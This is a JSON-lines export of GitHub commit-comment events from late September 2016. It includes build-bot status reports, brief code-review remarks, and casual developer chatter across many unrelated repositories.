{"id":"4634433516","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19217303,"position":null,"line":null,"path":null,"commit_id":"fb588cc683107fbb0e9dfc0acab1149122486c8c","created_at":"2016-09-29T01:07:29Z","updated_at":"2016-09-29T01:07:29Z","body":"master (evanweaver) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-fb588cc683107fbb0e9dfc0acab1149122486c8c-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-91.18%25-yellow.svg)</a> \n"}},"created_at":"2016-09-29T01:07:29Z"}
{"id":"4634436667","type":"CommitCommentEvent","actor":{"login":"heikoheiko"},"repo":{"name":"czepluch/EtherToTokenConverter"},"payload":{"comment":{"id":19217307,"position":46,"line":59,"path":"Converter.sol","commit_id":"139be673fd95d3403f4eda2d8ca494a2c8f670fc","created_at":"2016-09-29T01:08:26Z","updated_at":"2016-09-29T01:08:26Z","body":"Consider to call it `redeemEther`."}},"created_at":"2016-09-29T01:08:26Z"}
{"id":"4634437292","type":"CommitCommentEvent","actor":{"login":"sherlockhoatszx"},"repo":{"name":"linanqiu/word2vec-sentiments"},"payload":{"comment":{"id":19217308,"position":null,"line":null,"path":null,"commit_id":"44d024047705ca80eae2cbffb9175cee7e60fbbb","created_at":"2016-09-29T01:08:37Z","updated_at":"2016-09-29T01:08:37Z","body":"yes, model.docvecs works well. many thanks."}},"created_at":"2016-09-29T01:08:37Z"}
{"id":"4634437765","type":"CommitCommentEvent","actor":{"login":"ramses0"},"repo":{"name":"ramses0/qb"},"payload":{"comment":{"id":19217310,"position":null,"line":null,"path":null,"commit_id":"7ea16bca01dc374669714d5afeb3e892e656555d","created_at":"2016-09-29T01:08:45Z","updated_at":"2016-09-29T01:08:45Z","body":"Size: +456kb"}},"created_at":"2016-09-29T01:08:45Z"}
{"id":"4634438445","type":"CommitCommentEvent","actor":{"login":"justinrummel"},"repo":{"name":"justinrummel/jr.com-mm"},"payload":{"comment":{"id":19217312,"position":null,"line":null,"path":null,"commit_id":"635ae4524173a9c88999c55d5a6a88462fa93268","created_at":"2016-09-29T01:08:58Z","updated_at":"2016-09-29T01:08:58Z","body":"b/c it's obscured from the commit title, this is used by:\r\n\r\n``` bash\r\nbundle exec octopress new post -T _templates/photos \"New Photography Post Theme\"\r\n```"}},"created_at":"2016-09-29T01:08:58Z"}
{"id":"4634438541","type":"CommitCommentEvent","actor":{"login":"heikoheiko"},"repo":{"name":"czepluch/EtherToTokenConverter"},"payload":{"comment":{"id":19217313,"position":null,"line":null,"path":null,"commit_id":"139be673fd95d3403f4eda2d8ca494a2c8f670fc","created_at":"2016-09-29T01:09:00Z","updated_at":"2016-09-29T01:09:00Z","body":"where are the tests???"}},"created_at":"2016-09-29T01:09:00Z"}
{"id":"4634441854","type":"CommitCommentEvent","actor":{"login":"signallhill"},"repo":{"name":"cantino/huginn"},"payload":{"comment":{"id":19217319,"position":null,"line":null,"path":null,"commit_id":"5e5d1ea8288e839cc1f542c6fdebe6b980862e99","created_at":"2016-09-29T01:09:59Z","updated_at":"2016-09-29T01:09:59Z","body":"Thank you"}},"created_at":"2016-09-29T01:09:59Z"}
{"id":"4634442459","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19217323,"position":null,"line":null,"path":null,"commit_id":"cd3be8687af5b70656f74b9a2e63320bd97f81e9","created_at":"2016-09-29T01:10:10Z","updated_at":"2016-09-29T01:10:10Z","body":"os_2_0_develop (axelstudios) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-cd3be8687af5b70656f74b9a2e63320bd97f81e9-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-cd3be8687af5b70656f74b9a2e63320bd97f81e9-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T01:10:10Z"}
{"id":"4634443678","type":"CommitCommentEvent","actor":{"login":"DDuarte"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19217326,"position":null,"line":null,"path":null,"commit_id":"e2c92dbc63a16f07bd46b2423cfe23fc22ab90b0","created_at":"2016-09-29T01:10:31Z","updated_at":"2016-09-29T01:10:31Z","body":"https://community.trinitycore.org/topic/11084-tdb-misc-data/"}},"created_at":"2016-09-29T01:10:31Z"}
{"id":"4634448665","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19217339,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T01:12:07Z","updated_at":"2016-09-29T01:12:07Z","body":"我昨晚写完DSL系统之后刷了一晚上OI。。。\r\n中午回去我测试一下吧。反正之前的Win Form不知为何内存占用和CPU占用都巨大，会不会是线程模型写萎了。。\r\n\r\n现在我在用NOI Linux发issue。。。这个居然还有中文输入法。。。\r\n\r\n装的火狐也是停止维护的火狐。\r\n\r\nDSL是基于Kotlin的extension的，你去看看吧，我在README里面写了Demo。\r\n感觉颜值不错。 :joy:"}},"created_at":"2016-09-29T01:12:07Z"}
{"id":"4634452997","type":"CommitCommentEvent","actor":{"login":"nghiattran"},"repo":{"name":"CSHelper/firstPresentation"},"payload":{"comment":{"id":19217353,"position":null,"line":null,"path":null,"commit_id":"c9c7ce4b58e07c0783b75ce32e48ffb01adad17f","created_at":"2016-09-29T01:13:38Z","updated_at":"2016-09-29T01:13:38Z","body":"Eric, the homepage is usually called index.html so I change firstPresentationHomepage.html to index.html in pull request #1. If you are fine with it, just click on merge to update changes.\r\n\r\nTwo pages are also available on https://cshelper.github.io/firstPresentation"}},"created_at":"2016-09-29T01:13:38Z"}
{"id":"4634462792","type":"CommitCommentEvent","actor":{"login":"DougReeder"},"repo":{"name":"webOS-ports/luna-sysmgr"},"payload":{"comment":{"id":19217373,"position":null,"line":null,"path":null,"commit_id":"744631a0bff9f58e7280a261a5297acfd13b9897","created_at":"2016-09-29T01:16:55Z","updated_at":"2016-09-29T01:16:55Z","body":"Prefs should probably also contain \r\nOrg.webosports.cdav.app"}},"created_at":"2016-09-29T01:16:55Z"}
{"id":"4634465427","type":"CommitCommentEvent","actor":{"login":"martinthomson"},"repo":{"name":"ietf-wg-acme/acme"},"payload":{"comment":{"id":19217378,"position":null,"line":null,"path":null,"commit_id":"2258367a139a08796e9c712ca223db604b7495c2","created_at":"2016-09-29T01:17:47Z","updated_at":"2016-09-29T01:17:47Z","body":"Yes, drop the \"self-signed\" clause, that's all.  That gives them more discretion."}},"created_at":"2016-09-29T01:17:47Z"}
{"id":"4634466229","type":"CommitCommentEvent","actor":{"login":"yunguzi"},"repo":{"name":"yunguzi/InterviewMFG"},"payload":{"comment":{"id":19217383,"position":null,"line":null,"path":null,"commit_id":"34f16ad1b250fd94c29d236aaf65f8e1348e0ce7","created_at":"2016-09-29T01:18:03Z","updated_at":"2016-09-29T01:18:03Z","body":"Hi, I have finished the subject as requested, please check it, thank you very much。"}},"created_at":"2016-09-29T01:18:03Z"}
{"id":"4634469883","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":19217388,"position":null,"line":null,"path":null,"commit_id":"4050a1ba34a666dbb403df93d0f9996833b27fe9","created_at":"2016-09-29T01:19:16Z","updated_at":"2016-09-29T01:19:16Z","body":"#362 #366"}},"created_at":"2016-09-29T01:19:16Z"}
{"id":"4634471405","type":"CommitCommentEvent","actor":{"login":"ice1000"},"repo":{"name":"icela/FriceEngine-CSharp"},"payload":{"comment":{"id":19217392,"position":null,"line":null,"path":null,"commit_id":"e710914af611aa42ba5454c22a71ff8b7bfdda02","created_at":"2016-09-29T01:19:48Z","updated_at":"2016-09-29T01:19:48Z","body":"https://github.com/icela/FriceEngine-DSL @ifdog"}},"created_at":"2016-09-29T01:19:48Z"}
{"id":"4634472030","type":"CommitCommentEvent","actor":{"login":"Undergarun"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19217393,"position":null,"line":null,"path":null,"commit_id":"e2c92dbc63a16f07bd46b2423cfe23fc22ab90b0","created_at":"2016-09-29T01:20:00Z","updated_at":"2016-09-29T01:20:00Z","body":"@DDuarte \"You do not have permission to view this content.\" and i am logged in on forums. U.u Would be great to have access to such info."}},"created_at":"2016-09-29T01:20:00Z"}
{"id":"4634472416","type":"CommitCommentEvent","actor":{"login":"aboglioli"},"repo":{"name":"jafidiesel/MinervaModeling"},"payload":{"comment":{"id":19217397,"position":null,"line":null,"path":null,"commit_id":"f1d40c8d1c7dc6e3beeedb5b97e183b4414cd13f","created_at":"2016-09-29T01:20:08Z","updated_at":"2016-09-29T01:20:08Z","body":"Haberlo sabido antes. Sabía que era raro que se solucionase creando solamente un proyecto nuevo."}},"created_at":"2016-09-29T01:20:08Z"}
{"id":"4634474987","type":"CommitCommentEvent","actor":{"login":"efertsch"},"repo":{"name":"efertsch/phase-0-tracks"},"payload":{"comment":{"id":19217405,"position":null,"line":null,"path":null,"commit_id":"2e6b4b58cec828527bc265b401a411e21693d078","created_at":"2016-09-29T01:20:59Z","updated_at":"2016-09-29T01:20:59Z","body":"Should have created a feature branch to work on instead of master! :("}},"created_at":"2016-09-29T01:20:59Z"}
{"id":"4634476680","type":"CommitCommentEvent","actor":{"login":"Aokromes"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19217408,"position":null,"line":null,"path":null,"commit_id":"e2c92dbc63a16f07bd46b2423cfe23fc22ab90b0","created_at":"2016-09-29T01:21:35Z","updated_at":"2016-09-29T01:21:35Z","body":"Well, it's only needed for people with push permision, but:\r\n\r\nIf your spawn targets 335 spawn, creature range starts at 1, gameobject at 1.\r\nIf your spawn targets 434 spawn, creature range starts at 250000, gameobject at 200000.\r\nIf your spawn targets 548 spawn or higher, creature range starts at 450000, gameobject at 300000."}},"created_at":"2016-09-29T01:21:35Z"}
{"id":"4634482815","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19217422,"position":null,"line":null,"path":null,"commit_id":"a8ba8a796f02929fc32e477fe9002522bd8994ed","created_at":"2016-09-29T01:23:45Z","updated_at":"2016-09-29T01:23:45Z","body":"MakeWebKitWork (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a8ba8a796f02929fc32e477fe9002522bd8994ed-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-a8ba8a796f02929fc32e477fe9002522bd8994ed-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T01:23:45Z"}
{"id":"4634488001","type":"CommitCommentEvent","actor":{"login":"HeyGary"},"repo":{"name":"HeyGary/demo1"},"payload":{"comment":{"id":19217436,"position":null,"line":null,"path":null,"commit_id":"3c983841e2b7f7911d1e62c1876f2db84b593117","created_at":"2016-09-29T01:25:37Z","updated_at":"2016-09-29T01:25:37Z","body":"5555"}},"created_at":"2016-09-29T01:25:37Z"}
{"id":"4634490025","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19217439,"position":null,"line":null,"path":null,"commit_id":"656ccd5ab272269c6d8844d0f9b33a17b7666ec8","created_at":"2016-09-29T01:26:22Z","updated_at":"2016-09-29T01:26:22Z","body":"os_2_0_develop (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-656ccd5ab272269c6d8844d0f9b33a17b7666ec8-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-656ccd5ab272269c6d8844d0f9b33a17b7666ec8-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T01:26:22Z"}
{"id":"4634496292","type":"CommitCommentEvent","actor":{"login":"shminer"},"repo":{"name":"Alucard24/Alucard-Kernel-LG-G5"},"payload":{"comment":{"id":19217450,"position":null,"line":null,"path":null,"commit_id":"2049aea49dfba35371a15865ac2a09281883f38b","created_at":"2016-09-29T01:28:28Z","updated_at":"2016-09-29T01:28:28Z","body":"Nice job!\r\n\r\n"}},"created_at":"2016-09-29T01:28:28Z"}
{"id":"4634496891","type":"CommitCommentEvent","actor":{"login":"MTada7140"},"repo":{"name":"MTada7140/CodeclubMaterials"},"payload":{"comment":{"id":19217452,"position":null,"line":null,"path":null,"commit_id":"ada6b2adda8660ba3018ebb9302700fd3bf70234","created_at":"2016-09-29T01:28:42Z","updated_at":"2016-09-29T01:28:42Z","body":"Commit this changes"}},"created_at":"2016-09-29T01:28:42Z"}
{"id":"4634497503","type":"CommitCommentEvent","actor":{"login":"episodeyang"},"repo":{"name":"SchusterLab/M017_Yggdrasil"},"payload":{"comment":{"id":19217454,"position":null,"line":null,"path":null,"commit_id":"719e07d3a720f746604e8492083bd1c18f382ece","created_at":"2016-09-29T01:28:56Z","updated_at":"2016-09-29T01:28:56Z","body":"<img width=\"1367\" alt=\"screenshot 2016-09-28 20 25 17\" src=\"https://cloud.githubusercontent.com/assets/630490/18937907/2c308226-85ba-11e6-8a6a-d8a02caba400.png\">\r\n<img width=\"1019\" alt=\"screenshot 2016-09-28 20 27 10\" src=\"https://cloud.githubusercontent.com/assets/630490/18937908/2c3536ae-85ba-11e6-8059-a7a728230da1.png\">\r\n"}},"created_at":"2016-09-29T01:28:56Z"}
{"id":"4634502550","type":"CommitCommentEvent","actor":{"login":"zbeech"},"repo":{"name":"zbeech/volttron"},"payload":{"comment":{"id":19217473,"position":null,"line":null,"path":null,"commit_id":"176034fff6eb40081e8b22e7874311576b06c9d5","created_at":"2016-09-29T01:30:46Z","updated_at":"2016-09-29T01:30:46Z","body":"Line 11 creates an instance named `keystore`. I tested the script and it authenticates to the platform.\r\n\r\n(Although, this would not have been the first time I confused the case for the KeyStore class.)"}},"created_at":"2016-09-29T01:30:46Z"}
{"id":"4634503547","type":"CommitCommentEvent","actor":{"login":"Thoughtscript"},"repo":{"name":"Thoughtscript/demo-angular_table"},"payload":{"comment":{"id":19217480,"position":null,"line":null,"path":null,"commit_id":"0d80f34721b891e391def585136c6b615c28f7d0","created_at":"2016-09-29T01:31:09Z","updated_at":"2016-09-29T01:31:09Z","body":"Hack / Jank or awesome? Room for debate... it \"listens\" for a state then builds json then forces update on view.  I hate setTimeouts but this I think is the simplest way to do this without invoking massive amounts of promises."}},"created_at":"2016-09-29T01:31:09Z"}
{"id":"4634507283","type":"CommitCommentEvent","actor":{"login":"bodyno"},"repo":{"name":"bodyno/react-starter-kit"},"payload":{"comment":{"id":19217488,"position":null,"line":null,"path":null,"commit_id":"db71f76ec05e969ccb7261f0b943f5224a6bfb90","created_at":"2016-09-29T01:32:33Z","updated_at":"2016-09-29T01:32:33Z","body":"考虑到这是一个手脚架项目\r\n不宜使用太复杂的库\r\n所以回归最简单的express还有sass替换css-module"}},"created_at":"2016-09-29T01:32:33Z"}
{"id":"4634512263","type":"CommitCommentEvent","actor":{"login":"superjeffreyc"},"repo":{"name":"BinghamtonTableTennis/rating-system"},"payload":{"comment":{"id":19217500,"position":null,"line":null,"path":null,"commit_id":"870e2954eef3b3adf776d59fa4a67646bdc2aa6d","created_at":"2016-09-29T01:34:21Z","updated_at":"2016-09-29T01:34:21Z","body":"This is Shawn Bailey's commit (sbailey6). He accidentally committed under my name."}},"created_at":"2016-09-29T01:34:21Z"}
{"id":"4634513192","type":"CommitCommentEvent","actor":{"login":"MTada7140"},"repo":{"name":"MTada7140/CodeclubMaterials"},"payload":{"comment":{"id":19217505,"position":null,"line":null,"path":null,"commit_id":"2a481ca7b3c7066f4f674c6bd51ce57c97434c80","created_at":"2016-09-29T01:34:42Z","updated_at":"2016-09-29T01:34:42Z","body":"Add these files"}},"created_at":"2016-09-29T01:34:42Z"}
{"id":"4634513670","type":"CommitCommentEvent","actor":{"login":"tomka"},"repo":{"name":"catmaid/CATMAID"},"payload":{"comment":{"id":19217506,"position":null,"line":null,"path":null,"commit_id":"a5c0817d30f7c3ddffdf9c6a79044f785ee381b0","created_at":"2016-09-29T01:34:54Z","updated_at":"2016-09-29T01:34:54Z","body":"I meant to say \"remove TODO comment\""}},"created_at":"2016-09-29T01:34:54Z"}
{"id":"4634514162","type":"CommitCommentEvent","actor":{"login":"moshechaikin"},"repo":{"name":"moshechaikin/TAScience"},"payload":{"comment":{"id":19217509,"position":null,"line":null,"path":null,"commit_id":"6b704201d4d21314c9e281e34418457224af7769","created_at":"2016-09-29T01:35:06Z","updated_at":"2016-09-29T01:35:06Z","body":"Ahhh..... Figured it out! If I remove the https in the link it will load. Github has to serve the site with https!"}},"created_at":"2016-09-29T01:35:06Z"}
{"id":"4634515055","type":"CommitCommentEvent","actor":{"login":"lrusak"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":19217511,"position":null,"line":null,"path":null,"commit_id":"40cab058daf7d14f2cc3c3ccc8b59a2b483b2fe3","created_at":"2016-09-29T01:35:25Z","updated_at":"2016-09-29T01:35:25Z","body":"@Stane1983 what's the issue here?"}},"created_at":"2016-09-29T01:35:25Z"}
{"id":"4634516274","type":"CommitCommentEvent","actor":{"login":"Mysterium"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19217515,"position":null,"line":null,"path":null,"commit_id":"aff39fa2f141f78326f2f30d5d81a195f551746d","created_at":"2016-09-29T01:35:54Z","updated_at":"2016-09-29T01:35:54Z","body":"Doesn't work for me, CMake:* JadeCore revision      : unknown 1970-01-01 00:00:00 +0000 (Archived branch)\r\nGit is correctly installed.."}},"created_at":"2016-09-29T01:35:54Z"}
{"id":"4634516285","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19217516,"position":null,"line":null,"path":null,"commit_id":"833794140c562a010327741c01f0aefeb09b3da8","created_at":"2016-09-29T01:35:54Z","updated_at":"2016-09-29T01:35:54Z","body":"develop (evanweaver) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2362 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-833794140c562a010327741c01f0aefeb09b3da8-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-833794140c562a010327741c01f0aefeb09b3da8-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.49%25-yellow.svg)</a> \n"}},"created_at":"2016-09-29T01:35:54Z"}
{"id":"4634519486","type":"CommitCommentEvent","actor":{"login":"osheroff"},"repo":{"name":"zendesk/maxwell"},"payload":{"comment":{"id":19217524,"position":5,"line":140,"path":"src/main/java/com/zendesk/maxwell/schema/SchemaStoreSchema.java","commit_id":"df28e99aef4470a390da9b3eefe5e5da4b72d071","created_at":"2016-09-29T01:37:02Z","updated_at":"2016-09-29T01:37:02Z","body":"it's ok to use an `int` here, even if in code it's mostly a long"}},"created_at":"2016-09-29T01:37:02Z"}
{"id":"4634523237","type":"CommitCommentEvent","actor":{"login":"Uppermost"},"repo":{"name":"OpenNos/OpenNos"},"payload":{"comment":{"id":19217540,"position":null,"line":null,"path":null,"commit_id":"42f88caca47ba52fa7999ff66dd86ef149504e95","created_at":"2016-09-29T01:38:20Z","updated_at":"2016-09-29T01:38:20Z","body":"It's ok, now like official :)"}},"created_at":"2016-09-29T01:38:20Z"}
{"id":"4634523288","type":"CommitCommentEvent","actor":{"login":"nbougalis"},"repo":{"name":"vinniefalco/Beast"},"payload":{"comment":{"id":19217542,"position":71,"line":89,"path":"include/beast/websocket/detail/mask.hpp","commit_id":"8eac73fb251ada352e85fee40af72e32c74cbfd4","created_at":"2016-09-29T01:38:21Z","updated_at":"2016-09-29T01:38:21Z","body":"You can remove the `throw`: all you need to guarantee is that the state isn't 0 everywhere, and the `murmurhash3` call will take care of that for you."}},"created_at":"2016-09-29T01:38:21Z"}
{"id":"4634532301","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19217569,"position":null,"line":null,"path":null,"commit_id":"833794140c562a010327741c01f0aefeb09b3da8","created_at":"2016-09-29T01:41:24Z","updated_at":"2016-09-29T01:41:24Z","body":"develop (evanweaver) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-833794140c562a010327741c01f0aefeb09b3da8-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-29T01:41:24Z"}
{"id":"4634537387","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19217592,"position":null,"line":null,"path":null,"commit_id":"313f2893d5f329a8bec6dbe91b65ddd7a7cbbd0d","created_at":"2016-09-29T01:43:09Z","updated_at":"2016-09-29T01:43:09Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-313f2893d5f329a8bec6dbe91b65ddd7a7cbbd0d-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-313f2893d5f329a8bec6dbe91b65ddd7a7cbbd0d-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-29T01:43:09Z"}
{"id":"4634541063","type":"CommitCommentEvent","actor":{"login":"schneems"},"repo":{"name":"rails/rails"},"payload":{"comment":{"id":19217598,"position":null,"line":null,"path":null,"commit_id":"49c4af43ec5819d8f5c1a91f9b84296c927ce6e7","created_at":"2016-09-29T01:44:18Z","updated_at":"2016-09-29T01:44:18Z","body":"Done, thanks."}},"created_at":"2016-09-29T01:44:18Z"}
{"id":"4634545813","type":"CommitCommentEvent","actor":{"login":"HussMalik"},"repo":{"name":"HussMalik/HussMalik.github.io"},"payload":{"comment":{"id":19217616,"position":null,"line":null,"path":null,"commit_id":"6df99939e5386e23a55c327d4ed22f20d81b061f","created_at":"2016-09-29T01:45:51Z","updated_at":"2016-09-29T01:45:51Z","body":"new base name"}},"created_at":"2016-09-29T01:45:51Z"}
{"id":"4634546994","type":"CommitCommentEvent","actor":{"login":"halkyon"},"repo":{"name":"silverstripe/silverstripe-crontask"},"payload":{"comment":{"id":19217625,"position":4,"line":133,"path":"code/controllers/CronTaskController.php","commit_id":"31fcf0c192b634df489a549cef80cd241fa9929d","created_at":"2016-09-29T01:46:12Z","updated_at":"2016-09-29T01:46:12Z","body":"@dhensby DBDatetime doesn't exist in 3.1, and composer.json has `~3.1` for framework requirements."}},"created_at":"2016-09-29T01:46:12Z"}
{"id":"4634547724","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19217630,"position":null,"line":null,"path":null,"commit_id":"6c7848bd6a41a7134ee1a70f3344a7f623da88a1","created_at":"2016-09-29T01:46:27Z","updated_at":"2016-09-29T01:46:27Z","body":"<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-Win64-Windows-7-VisualStudio-12.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-29T01:46:27Z"}
{"id":"4634550600","type":"CommitCommentEvent","actor":{"login":"Sycholic"},"repo":{"name":"Sycholic/PermissionsEx"},"payload":{"comment":{"id":19217638,"position":null,"line":null,"path":null,"commit_id":"2f4b3d0932144857abac59e13f20dc20f55798a2","created_at":"2016-09-29T01:47:24Z","updated_at":"2016-09-29T01:47:24Z","body":"its been working far as I can tell testing up to this point.  got a push upcoming removing a ton of not null checks yanked out.  that one likely do a offline multiple player server test.  either way technically still in the middle of cleaning house and still on the fence about functional operation changes (there is like 50+ possible  code blocks that could or not be changed...)"}},"created_at":"2016-09-29T01:47:24Z"}
{"id":"4634555174","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19217643,"position":null,"line":null,"path":null,"commit_id":"313f2893d5f329a8bec6dbe91b65ddd7a7cbbd0d","created_at":"2016-09-29T01:48:53Z","updated_at":"2016-09-29T01:48:53Z","body":"os_2_0_develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-313f2893d5f329a8bec6dbe91b65ddd7a7cbbd0d-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-29T01:48:53Z"}
{"id":"4634555669","type":"CommitCommentEvent","actor":{"login":"Undergarun"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19217646,"position":null,"line":null,"path":null,"commit_id":"e2c92dbc63a16f07bd46b2423cfe23fc22ab90b0","created_at":"2016-09-29T01:49:03Z","updated_at":"2016-09-29T01:49:03Z","body":"Thank you. Could be great to have that info available to everyone. To keep in mind for Pull Requests."}},"created_at":"2016-09-29T01:49:03Z"}
{"id":"4634565843","type":"CommitCommentEvent","actor":{"login":"mysticalre"},"repo":{"name":"mysticalre/HelloWorld"},"payload":{"comment":{"id":19217667,"position":null,"line":null,"path":null,"commit_id":"f74d421ff48f9fd682ea3744569b7d8e2a689b4e","created_at":"2016-09-29T01:52:26Z","updated_at":"2016-09-29T01:52:26Z","body":"commentyeee"}},"created_at":"2016-09-29T01:52:26Z"}
{"id":"4634567248","type":"CommitCommentEvent","actor":{"login":"emazelayandia"},"repo":{"name":"emazelayandia/emazelayandia"},"payload":{"comment":{"id":19217669,"position":null,"line":null,"path":null,"commit_id":"eb168a3ec341dacbe194f5f0fa7e24741fe7fc3b","created_at":"2016-09-29T01:52:53Z","updated_at":"2016-09-29T01:52:53Z","body":"Listening to Starman by David Bowie on Pandora. Hmmm, I seem to like it. `"}},"created_at":"2016-09-29T01:52:53Z"}
{"id":"4634569062","type":"CommitCommentEvent","actor":{"login":"olabini"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":19217675,"position":4,"line":248,"path":"otrv4.md","commit_id":"3a93618c6359cf86672307e49acfb12735882f67","created_at":"2016-09-29T01:53:28Z","updated_at":"2016-09-29T01:53:28Z","body":"I'm not sure if we should assume the underlying transport leaks metadata. As an example, you have Ricochet.\r\nOn the other hand, we have the instance tags..."}},"created_at":"2016-09-29T01:53:28Z"}
{"id":"4634569403","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19217676,"position":null,"line":null,"path":null,"commit_id":"89d4998510bccbf7817671171c25cf71deab6f9a","created_at":"2016-09-29T01:53:35Z","updated_at":"2016-09-29T01:53:35Z","body":"@elpaso looks good to me!"}},"created_at":"2016-09-29T01:53:35Z"}
{"id":"4634570967","type":"CommitCommentEvent","actor":{"login":"kevinzurek"},"repo":{"name":"FEMR/femr"},"payload":{"comment":{"id":19217677,"position":null,"line":null,"path":null,"commit_id":"c87717cc81313bca07bd598c52ea99936f0753ab","created_at":"2016-09-29T01:54:07Z","updated_at":"2016-09-29T01:54:07Z","body":"Thanks, @jmflorezff ! Can we get this in a Pull Request?"}},"created_at":"2016-09-29T01:54:07Z"}
{"id":"4634573171","type":"CommitCommentEvent","actor":{"login":"emazelayandia"},"repo":{"name":"emazelayandia/emazelayandia"},"payload":{"comment":{"id":19217683,"position":null,"line":null,"path":null,"commit_id":"eb168a3ec341dacbe194f5f0fa7e24741fe7fc3b","created_at":"2016-09-29T01:54:50Z","updated_at":"2016-09-29T01:54:50Z","body":"I have little to no idea as to what I am doing. I don't remember what I was taught at the Computer Science Club meeting. I guess I didn't take very detailed notes. Sigh* "}},"created_at":"2016-09-29T01:54:50Z"}
